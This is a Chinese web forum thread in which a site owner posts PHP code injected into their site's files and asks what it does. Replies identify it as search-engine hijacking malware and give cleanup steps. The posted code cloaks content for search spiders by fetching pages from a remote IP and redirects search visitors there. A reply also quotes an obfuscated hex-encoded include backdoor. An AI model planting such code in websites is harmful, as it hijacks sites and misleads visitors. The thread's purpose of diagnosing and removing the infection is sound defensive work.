這一段是什么意思，網(wǎng)站異常卡，是被掛馬了，怎么查找.....

monery2

header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://137.220.220.7/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}

$httpuser=strtolower($_SERVER['HTTP_REFERER']);
if(strstr($httpuser,'sogou') or strstr($httpuser,'baidu') or strstr($httpuser,'HaosouSpider') or strstr($httpuser,'YisouSpider'))

{

Header("Location: http://137.220.220.7/");//

exit;

}


怎么查找其他php文件也包含這個。。。鋪天蓋地的碼

Killer

您這可能是被掛馬了哦

好佳芯科技

看樣子是木馬，https://addon.dismall.com/plugins/nayuan_safe.html

allthebest

若存在，處理前，先卸載所有盜版插件與模版。

進discuz后臺找到工具-文件校驗，看下最近有哪些php文件被修改了。

1、排查網(wǎng)站源文件的php 文件，查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站（上面跳轉(zhuǎn)的網(wǎng)站），如果有刪除就可以了。

2、排查網(wǎng)站源文件的php 文件，查看是否有如下代碼：@include($_SERVER['DOCUMENT_ROOT']

（排查一般用WEBshell后門掃描軟件掃描核查！）

如果有就刪除此段代碼。并把該段代碼進行解密。

舉例：@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為：2F646174612F6176617461722F30

解密后為：/data/avatar/0

代碼解密地址：http://www.bejson.com/convert/ox2str/


意思就是在上述路徑下存在被非法上傳的文件，用于做快照劫持。

解決辦法：刪除上面的代碼和文件即可。

掛馬問題解決了后，記得更改服務(wù)器相關(guān)的各種密碼，盡量設(shè)置的復雜一點。

鴻茂傳媒

被掛馬了。

hhb121

這個是被掛馬了，當搜索引擎訪問頁面后，自動跳轉(zhuǎn)到目標網(wǎng)站或者ip，出現(xiàn)這種問題，一般就是服務(wù)器安全沒做到位，或者使用了盜版插件造成的。